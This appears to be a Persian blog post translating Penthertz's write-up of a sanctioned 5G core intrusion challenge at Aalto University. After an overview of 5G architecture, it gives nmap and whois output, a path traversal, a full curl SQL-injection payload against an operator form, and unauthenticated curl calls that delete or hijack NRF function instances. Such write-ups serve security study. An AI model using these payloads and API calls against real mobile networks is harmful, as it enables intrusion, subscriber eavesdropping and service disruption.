وبلاگ

نفوذ به شبکه ۵G از خارج و داخل

نصب ۵G در زندگی ما حضور بیشتری پیدا کرده است و تغییرات قابل توجهی در رابطه با افزایش تقاضای کاربران و افزایش ترافیک با گذشت زمان ایجاد کرده است توسعه ۵G نه تنها از نظر سرعت در این زمینه یک تحول است‌ این تکنولوژی تمایل دارد در زمینه های مختلفی بجز سرعت بدرخشد مانند پزشکی حمل و نقل  صنایع و انرژی و… سازگار شود و یجورایی مورد استفاده قرار گیرد در این مقاله قراره خلاصه ای از معرفی شبکه های مبتنی بر ۵G رو داشته باشیم و یک ارزیابی از نظر امنیتی در رابطه با این شبکه ها رو هم در کنار معرفی انجام بدیم تیم deepercut و penthertz  باهم ارزیابی هایی انجام دادن چالش های pwc و alto 5g رو برای معرفی حملات احتمالی به این شبکه های با هسته ۵g طراحی کردن در کنار این چالش ها ابزار هایی که در penthertz توسعه دادن رو هم در نظر میگیریم.

در سال ۲۰۱۹ بخشی از تیم penthertz  شانس شرکت و برنده شدن در یکی از چالش Future 5G Hospital intrusion یک چالش نسخه امنیتی برای نفوذ به شبکه های ۵g هستن و طوری عمل میکنن مثلا یک شبکه با دسترسی غیر مستقل ۵G بود این شبکه اینطوری کار میکنه که از یک رابطه ۵g-nr و از یک کارت isim ارائه شده استفاده می شود.

سایت penthertz در رابطه با روش نفوذش به این شبکه مقاله کاملی توی medium منتشر کرده میتونید بررسی کنید.

 

[ آموزش تشخیص کارت شبکه های مناسب تست نفوذ ]

شبکه های ۵G

دو نوع معماری برای شبکه های ۵G شناخته شده یا بهتره بگم استفاده شده است 

  • SA
  • NSA

تا الان از nsa خیلی استفاده میشه ولی خب اینجور که معلومه از اواسط ۲۰۲۲ قرار بر این است که از SA هم خیلی زیاد تر استفاده کنند یجورایی حکم اپدیت رو داره براشون  .  

مثلا استقرار شبکه ۵G تجاری که از حالت NSA استفاده می کند و همان شبکه اصلی LTE را به اشتراک می گذارد که به NSA LTE کمک می کند میشه گفت یه همچین حالتی میشه نگاهی به طرح زیر بندازید.

از نظر فنی  EPC که بین ۴G و ۵G استفاده می شود تغییرات بزرگی ایجاد نمی کند جدا از رادیویی که در آن ۵G-NR تا ۱۰۲۴ مدولاسیون و دامنه چهارگانه QAM استفاده می کند و کانال هایی تا ۴۰۰ مگاهرتز را پشتیبانی می کند و همچنین با تعداد بیشتری از حامل های فرعی در مقایسه با ۴G به اشتراک گذاشته شده با آنتن های ۴G مثل همیشه سر همین محدودیت هایی در سرعت پیدا خواهد شد. در sa همه چیز به طور کامل در هسته به عنوان یک شبکه نسل بعدی ngcn با جایگزینی epc تغییر می کند :

این یک نوع جدید از شبکه مبتنی بر ۵G که به کمک مجازی سازی, شبکه NFV, تقسیم داده ها, و ایجاد سطح کنترل شبکه برای کمک به امنیت اطلاعات در نرم افزار SDN از اتصال بسیار سریع و برنامه های کاربردی مختلف پشتیبانی می کند.

با توجه به nfv در معماری آینده ۳GPP,5G-NR SA یک معماری مبتنی بر سرویس SBA برای جایی که از سرویس هایی مثل HTTP/2  استفاده می کنند می توان گفت رابط بین تجهیزات یوزر که توی طرح پایین به عنوان ue مشخص شده و هسته n1 شبکه و هسته n2و n3 توی طرح زیر میشه گفت کاربر از پیوند نقطه به نقطه استفاده کرده 

به طور کلی میشه گفت وقتی که استاندارد ها ثابت می شوند شبکه تلفن همراه به ندرت ارتقا پیدا میکند این رو میشه توی ۲G و ۳G مشاهده کرد اما در ۴G بسیاری از برنامه های ارتباطات و MTC و اینترنت چیز ها یا حالا اشیا یا همون IOT وارد شد در نتیجه شبکه های ۴G  یجورایی یک موجودیت جدید معرفی شده توسط ۳GPP  است که به روز می شدند mtc-iwf عملکرد متقابل mtc یک معماری جدید آن باعث می شود شبکه های هسته ۵G انعطاف پذیر تر شوند . مدل SBA اجازه می دهد تا دو نقش را در نرم افزار بازی کنید یه جورایی همچین نقش ها و همچین حالت هایی رو 

  1. ارائه دهنده خدمات 
  2. یک مصرف کننده

همه تابع ها از طریق یک bus و با استفاده از rest api به همدیگر متصل میشن و می توانند به روز یا حذف شوند.

احساس میکنم درباره مباحث به طور خلاصه یه جورایی توضیح دادیم بریم یکم بحث رو امنیتی کنیم درباره یک آسیب پذیری خفن که گروه NCC  قبلا درباره اش خبر داده بودن در واقع آسیب پذیری از نوع stack overflow که در upf بخش stack open5gs پیدا کرده بودند منتشر کردن. اطلاعات منتشر شده واقعا جالب هستن میتونید درباره اشون مطالعه کنید.

نقشه حمله به شبکه

برای نشون دادن نحوه انجام حملات و نقشه های احتمالی ۵G سر همین penthertz  اومده یک معماری از چالش ۵GNC منتشر کرده که چیز باحالیه بیاین بررسی کنیم..

#سخنان امیر 🙂 این در واقع یه جورایی توضیح این چالشه این بخش 😉

معماری که الان دارین میبینید شامل یک gNB  واقعیه که در واقع بهش با ۵G-NR  متصل شده اند. کسانی که اونجا کار میکنند یا کارکنان اونجا به ما این اجازه رو دادن که یک هسته از محیط یا همون playground هسته زمین بازی داشته باشیم تا با معماری دسترسی های ssh آشنا بشیم . برای دریافت اطلاعات و استاتوس که اونجا داریم LED ما توی یک زمان واقعی اهداف رو توی یک کانال یوتیوب پخش میکنه. برای تکمیل این چالش سازمان کلید های ssh تولید شده برای اتصال به شبکه ۵G ارائه دادن از اونجا تونستن مستقیم تعاملاتی داشته باشن اما اینکه اوضاع تیم میخواست برای تند تر شدن فرایند کار با رویکرد های تیم قرمز یا رد تیم رو در نظر بگیره  .

یکسری نکته هست مثلا هسته ۵G که توی چالش استفاده شده با استفاده از go نوشته شده بود.

آقا بریم که وارد فاز تست نفوذ بشیم :/

حتی اگه اول از همه به شبکه اصلی playground برای آشنایی ۵G SA فرایند هاشو داشتن ولی تیم با fingerprinting ادامه داد تا ببینه میتونن مستقیم با شبکه اصلی ۵G توی این فرایند join بشن یا نه (یا حالا بپیوندن یجوریه کلمات فارسیش) 

در ادامه تیم ip public رو گرفت و فقط به دنبال محدوده های دیگر از زیرساخت هستن رو ریورس کردن و به سرعت متوجه شدن که عه این محدوده مناسب برای FL-TKK****-NET  میتونه چیز جالبی باشه 

# دوستان این FL-tkk****-net در واقع netname ما هستش 

				
					whois 195.148.**.**    
[...]

inetnum:        195.148.***.0 - 195.148.***.255
netname:        FI-TKK****-NET
descr:          TKK Comnet
country:        FI
admin-c:        MP14***-RIPE
tech-c:         MP14***-RIPE
status:         ASSIGNED PA
mnt-by:         AS17**-MNT
created:        2009-02-13T10:44:24Z
last-modified:  2009-02-13T10:44:24Z
source:         RIPE

person:         Markus P********
address:        Helsinki University of Technology
address:        TKK/TLV
address:        P.O.Box 3000
address:        FIN-02015 TKK  Finland
phone:          ****************
nic-hdl:        MP14***-RIPE
mnt-by:         AS17**-MNT
created:        2009-02-13T10:37:57Z
last-modified:  2017-10-30T22:04:40Z
source:         RIPE # Filtered
				
			

 

بعد از اینکه اینو پیدا کردن شروع به اسکن این رنج کردن و چیزای جالبی پیدا شد :

  • ۵GC1.research.*.aalto.fi (195.148..***);
  • 5GC2.research.*.aalto.fi (195.148..***).

در بین این هاست ها اینها میتونن هاست های دیگرس رو هم پیدا کنن اما احتمالا خارج از این رنج هستن چون هدف آزمایش پهباد ها و VR/AR هستش که اینا تصمیم گرفتن گفتن چه کاریه بیاین فعلا روی همین دوتا هاست تمام تمرکز و زورمون رو بزاریم

وب اینترفیس های Expos (در معرض دید (عمومی) )

اینها فرایندی رو داشتن که به نظر رسید دوتا اینترفیسی که روشون تمام زورشون رو گذاشتن یک وب اینترفیس جالب توی tcp 3000 داره که برای هر دوتا هاست و یک اینترفیس رابط tcp 5050 برای این ip زیر داره

 ip 195.148.*.

				
					Nmap scan report for 5GC1.research.****.aalto.fi (195.148.***.***)
Host is up (0.044s latency).
Not shown: 997 closed ports
PORT     STATE    SERVICE  VERSION
[...]
۳۰۰۰/tcp open     ssl/http Node.js (Express middleware)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: EPC USER INTERFACE
| ssl-cert: Subject: commonName=www.localhost.com/organizationName=c****core/stateOrProvinceName=ESPOO/countryName=FI
| Issuer: commonName=www.localhost.com/organizationName=c***core/stateOrProvinceName=ESPOO/countryName=FI
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-01-10T08:20:47
| Not valid after:  2020-02-09T08:20:47
| MD5:   3bea 59c5 d273 8e76 943e 5da1 ca0f 2040
|_SHA-1: f5fc 11d5 489e b5a9 27e3 66b7 386e 05e0 5b79 78ea
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
[...]
Nmap scan report for rs-122.research.*****.****.fi (195.148.***.***)
Host is up (0.044s latency).
Not shown: 996 closed ports
PORT     STATE    SERVICE  VERSION
۲۲/tcp   open     ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   ۲۰۴۸ a3:8f:d9:************************************** (RSA)
|   ۲۵۶ ۱۹:۹۹:۴d:*************************************** (ECDSA)
|_  ۲۵۶ ۲۲:۹۹:۸۰:*************************************** (ED25519)
۲۵/tcp   filtered smtp
۳۰۰۰/tcp open     ssl/http Node.js (Express middleware)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: EPC USER INTERFACE
| ssl-cert: Subject: commonName=www.localhost.com/organizationName=c****core/stateOrProvinceName=ESPOO/countryName=FI
| Issuer: commonName=www.localhost.com/organizationName=c***core/stateOrProvinceName=ESPOO/countryName=FI
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-01-10T08:20:47
| Not valid after:  2020-02-09T08:20:47
| MD5:   3bea 59c5 d273 8e76 943e 5da1 ca0f 2040
|_SHA-1: f5fc 11d5 489e b5a9 27e3 66b7 386e 05e0 5b79 78ea
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
| tls-nextprotoneg: 
|   http/1.1
|_  http/1.0
۵۰۵۰/tcp open     mmcc?
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Connection: close
|     Content-Length: 232
|     Content-Type: text/html; charset=utf-8
|     Date: Mon, 14 Jun 2021 15:18:55 GMT
|     Server: waitress
|     <!DOCTYPE#fig:c****core1#fig:c****core1E HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>۴۰۴ Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Connection: close
|     Content-Length: 2407
|     Content-Type: text/html; charset=utf-8
[...]
				
			

این تیم وقتی این ها رو دیدن خوشحال و خندان رفتن سراغ پیدا کردن آسیب پذیری های وب اپلیکیشن از این اینترفیس ها

 

آسیب پذیری های وب در رابط کاربری گرافیکی gui

با bruteforce کردن دایرکتوری ها در وب اینترفیس ها مشخص میشه که حداقل یکیشون آسیب پذیری path traversal داره و بهشون دسترسی به رابط یا اینترفیس network management رو میده که دقیقا این زیر اومده :

# به به عجب چیزی پیدا کردن 

ولی خب بگذریم الان که این آسیب پذیری پیدا شد و همچین دسترسی میشه دنبال Pre-shared key های hidden بود که برای استخراج کلید های سشن هر مشترک استفاده میشه

در این زمینه کلید های فقط برای این چالش تکراری شدن چون دسته ای از کارت های isim با همون کلی راحت تره ولی خب تصور کنید اگه این کلید ها واقعا در زمینه دنیای واقعی استفاده میشد هکر میتونه از این اطاعات حساس استفاده کنه و تارگت ها رو در fake gNB به دام بندازه مثل BTS یا NodeB میتواند خود را با آن احراز هویت کند key در واقع اگه بخوایم از یک srsRAN برای ۴G و ۵G NSA یا یک Amarisoft gNB استفاده کنیم و کلید هر کاربر را به روش زیر ارائه کنیم میتونیم از ارتباطات نزدیک به تارگت ها جاسوسی یا همون spy بزنیم خیلی جالبه پشت سر این آسیب پذیری یک آسیب پذیری دیگه هم پیدا شد که این امکان رو میده که اطلاعات بیشتری کسب کرد

 

پسورد های leak شده

خیلی قشنگ کار کردن و دمشون گرم ولی خب این دیتابیس رو نتونستن مستقیم ببینن سر همین رفتن سراغ چیزی که خیلی ها باهاش آشنا هستن

 

تزریق SQL یا همون SQL injection

در واقع با بررسی مسیر های فایل جاوا اسکریپت toutes.js مشخص شد که یسری از کوئری های SQL پارامتر شدن و برای اکثرشون از یک تابع (function) استفاده شده با این حال در بین این همه آپشن این operator یک آپشن خیلی واضح بود :

 

				
					check('mcc').isInt({ min: 100, max: 999 }).withMessage('Error! mcc should be integer value!').trim().escape(),
check('mnc').isLength({ min: 1, max: 3 }).withMessage('Error! Mnc should not be empty !').trim().escape(),
check('op').isHexadecimal().withMessage('Error! The op field requires hexadecimal value!').trim().escape(),
check('amf').isHexadecimal().withMessage('Error! The amf field requires hexadecimal value!').trim().escape(),
check('name').isLength({ min: 1 }).withMessage('Error! The name field requires alphanumeric characters!').trim()
... snipped .
mysql_op = "INSERT INTO operators (mcc,mnc,op,amf,name) values ('" + req.body.mcc + "','" + req.body.mnc + "',UNHEX('" + req.body.op + "'),UNHEX('" + req.body.amf + "'),'" + req.body.name + "')";
db.query(mysql_op, function (err, op_data) {..

				
			

با تست این آپشن ها فهمیدن که امکان ذخیره یک ریزالت در یک ستون با استفاده از کوئری زیر وجود دارد:

				
					$ curl -L -k  'https://195.148.****:3000/operator' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Referer: https://195.148.******:3000/display_operator' -H 'DNT: 1' -H 'Connection: keep-alive
' -H 'Cookie: connect.sid=s%3A77zZAllwXzI3OMKe6gK5b1iy***********************************************************'  -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: https://19
۵٫*******:۳۰۰۰' --data-raw 'mcc=901&mnc=01&op=f964ba947*********************&amf=8000&name=a%27%29%3B%20SELECT%20COUNT%28%2A%29%20INTO%20%40v1%20FROM%20five_g_service_data%3B%20UPDAT
E%20operators%20SET%20operators.name%20%3D%20LEFT%28%40v1%2C%2020%29%20WHERE%20operators.mcc%20%3D%20%27901%27%20%23%20'
				
			

در ادامه نتیجه کوئری که ارسال شد این بود :

 ولی خب با این حال معلوم شده که محدود به حد اکثر ۲۰ کاراکتر شده ان که در این نوع بزرگتره بعد از این فرایند تونستن که تایم فانکشن ها , نتیجه رو در حالت جعبه سیاه پیدا کنن پس بهترین آپشن این بود که اونو خودکار کنن (automate) .

بعد از این به نظر میرسید که فرایند جعبه سیاه به پایان رسید و از ssh های ارائه شده توسط ارائه دهنده های چالش برای ادامه در داخل شبکه اپراتور باید استفاده کرد.

 

Interaction with NRF

توی شبکه اپراتور مشخص میشه که چند سیستم به ویژه یسری endpoint توی https رو اسکن و کشف کنن که معلوم میشه اون نقطه آخر NRF یا Network Function Repository Function

 هستن:

				
					$ curl -k -X GET "https://10.33.*****:9090/bootstrapping" -H "accept: application/3gppHal+json"
{"status":"OPERATIVE","_links":{"authorize":{"href":"https://10.33.******:9090/oauth2/token"},"discover":{"href":"https://10.33.******:9090/nnrf-disc/v1/nf-instances"},"manage":{"href":"https://10.33.******:9090/v1/nf-instances"},"self":{"href":"https://10.33.1.12:9090/bootstrapping"},"subscribe":{"href":"https://10.33.1.12:9090/nnrf-nfm/v1/subscriptions"}}}
				
			

در حالی که این روش نقاط آخر api رو برای انواع مختلفی از وظایف ریزالت میده. بعد از اون میشه این api رو بیشتر بررسی کرد مثلا میتونیم از نقاط nf-instances استفاده کنیم مثلا:

				
					$ curl -k -X GET "https://10.33.*****:9090/nnrf-disc/v1/nf-instances?target-nf-type=NRF&requester-nf-type=NRF"
{"validityPeriod":120,"nfInstances":[{"nfInstanceId":"8cfcf12f-c78f-******************","nfType":"NRF","nfStatus":"REGISTERED","nfInstanceName":"nrf-cumu","plmnList":[{"mcc":"244","mnc":"53"}],"ipv4Addresses":["10.33.*******:9090"],"allowedPlmns":[{"mcc":"244","mnc":"53"}],"allowedNfTypes":["NWDAF","SMF","NRF","UDM","AMF","AUSF","NEF","PCF","SMSF","NSSF","UDR","LMF","GMLC","5G_EIR","SEPP","UPF","N3IWF","AF","UDSF","BSF","CHF","PCSCF","CBCF","HSS","SORAF","SPAF","MME","SCSAS","SCEF","SCP"],"nfServiceList":{"0":{"serviceInstanceId":"0","serviceName":"nnrf-disc","versions":[{"apiVersionInUri":"v1","apiFullVersion":"1.0.0"}],"scheme":"https","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.1.12","ipv6Address":"","transport":"TCP","port":9090}],"allowedPlmns":[{"mcc":"244","mnc":"53"}]},"1":{"serviceInstanceId":"1","serviceName":"nnrf-nfm","versions":[{"apiVersionInUri":"v1","apiFullVersion":"1.0.0"}],"scheme":"https","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.****","ipv6Address":"","transport":"TCP","port":9090}],"allowedPlmns":[{"mcc":"244","mnc":"53"}]}}}]}
				
			

آقا اینو هم بگم همه این کوئری ها بدون هیچ فرایند authentication انجام شده ان با این وجود اگر نمی خواهیم تمام فایل های yml رو پر کنیم به درک خوبی نسبت به openAPI 3GPP نیاز داریم . خوشبختانه برای این دوستامون از penthertz پروژه ای مثل ۵GC API بوده که بهشون اجازه میداد زمان زیادی صرفه جویی کنن.

 

یه پروژه مثل ۵GC API این اجازه رو میده خودمون کوئری ها رو بسازیم ولی خب اگه میخوایم مثلا یسری از کار ها خودکار باشه باید این کوئری ها رو به burp suite ارسال کنیم که معرف حضورتون هست اما این دوستامون میخوان رفتارها و نحوه کار رو با دقت بیشتری ثبت کنن حرکت قشنگی زدن واقعا

 

اومدن یکم با این endpoint های مختلف بازی کردن باهاشون و همینطور حذف نمونه های nf ایجاد شده برای چالش تونستن به این تارگت چالش برسن:

				
					$ curl -k -X DELETE "https://10.33.*****:9090/nnrf-nfm/v1/nf-instances/84694f7d-7f76-44af************************" -H  "accept: */*" # first API call
$ curl -k -X DELETE "https://10.33.*****:9090/nnrf-nfm/v1/nf-instances/84694f7d-7f76-44a*****************" -H  "accept: */*" # second API call
{"title":"Data not found","status":404,"cause":"DATA_NOT_FOUND"}
				
			

ولی خب با فرایند هایی مثل put web verb  تونستن کلاینت hijacking بزنن و یا یسری نمونه ایجاد کنن:

این خیلی خیلی خطرناکه شما فکرشو بکنید که یک اینترفیس nrf جلوی دست attacker بدون authentication میتونه فرایند های جالب و البته ترسناکی رو داشته باشه چون ببینید هر فانکشن یه وظیفه ای رو داره و hijacking کردن هر کدوم از تابع ها به attacker این امکان رو میده که دیتا های حساس رو برداره و یک نظارت کلی به تمام دیتا ها و حتی ارتباطات شبکه داشته باشه و به سمت دیتا های حساس هدایت بشه. به راحتی میشه فرایندی رو داشت تا به زیرساخت های بیشتری دسترسی پیدا کنه که این اصلا خوب نیست. (به قول گفتنی این بده)

 

به باینری های لو رفته بیشتر پیش بریم

طی فرایند نفوذ یهو با خودشون گفتن میتونیم باینری ها رو هم بیرون بکشیم ولی خب وقتی دیدنش ذوقشون تبدیل به تعجب و حتی چیزای دیگه شد و فهمیدن که ریورس کردنش قراره سخت باشه :

				
					$ file *
amf:             ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=08f94b071650da3554e5b95f70e6ba3850ce6318, with debug_info, not stripped
amf_config.json: ASCII text
cert:            directory
config.yml:      ASCII text
go-upf:          ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, Go BuildID=ckq7fZLxgmR6uenXU4JZ/KAXEUT7OwQ1xBaGVgD_7/ooHH5veYSKyfB5KX-Pjl/gKzOtxFRdL-lJs_6ac2l, stripped
hackathon_tckn:  data
nrf:             ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, Go BuildID=uX08ekosFePKbnLnF0QB/JUYvVUCmbTHKFc0ERXZw/ZsdPpGDbVPLe-CI-lzfU/KT8XrjYx8vFbsGgXj9wS, not stripped
nrf-config.yml:  ASCII text
private.key:     PEM RSA private key
public.crt:      PEM certificate
pub.pem:         ASCII text
smf:             ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=00c4f4b9e2b8c364e8d6598336d1003324ed76c9, with debug_info, not stripped
smf_config.json: JSON data
				
			

فهمیدن این باینری های جالب به زبان go هستن ولی خب اینها با اینکه زمان زیادی برای کار کردن روی باینری نداشتن ولی خب گفتن خوبه که با یک fuzzer شبکه به این مورد ها نگاه کنیم برای کمک به معکوس کردن باینری ها یک پلاگین ghidra برای معماری های x86_64 در دسترس شون بود :

حتی اگه تجزیه و تحلیل این فرایند سخت و دردناک باشه این افزونه کمک زیادی به بازیابی نام فانکشن ها و return می کنه که برای تارگت های fuzzy هم خوبه.

نتیجه:

انتظار می رود ۵G-NR SA به زودی برای عموم منتشر شود و شاهد بودیم که پروتکل شبکه جدیدی در HTTP/2 برای این منظور استفاده خواهد شد. در واقع، به این معنی است که شکل جدیدی از حمله نیز در صنعت مخابرات معرفی خواهد شد، که در حال حاضر تنها با حملات شبکه در هسته سروکار داشت، اما همچنین باید از آسیب‌پذیری‌های وب بالقوه در آینده آگاه باشد. . تیم penthertz به لطف رویداد امنیت سایبری ۵G نشان دادند که حتی شبکه اصلی ۵G-NR SA بسته به سرویس‌های افشا شده و اجرای سرویس‌ها و برنامه‌های کاربردی وب، می‌تواند در معرض خطر قرار گیرد و به راحتی مورد حمله قرار گیرد. در واقع، رابط NRF در موارد ما مستقیماً در معرض دید قرار نگرفت، و دسترسی به این رابط در حالی که رابط شبکه اصلی آسیب‌پذیر در معرض دید قرار می‌گیرد، راه طولانی است.

 

منبع:

https://penthertz.com/blog/Intruding-5G-core-networks-from-outside-and_inside.html

اشتراک گذاری:

مطالب زیر را حتما مطالعه کنید

3 دیدگاه

به گفتگوی ما بپیوندید و دیدگاه خود را با ما در میان بگذارید.

    • سلام دوست عزیز این مقاله بر اساس نوشته تیم penthertz ، نوشته و ترجمه دقیق شده هست و اگر کسی تو شاخه تست نفوذ شبکه فعالیت خوبی داشته باشه قطعا میدونه مطلب چی هستش اگر بخشی از مطلب رو متوجه نشدید میتونید سوالتون کامنت کنید و ما راهنمایی میکنیم

دیدگاهتان را بنویسید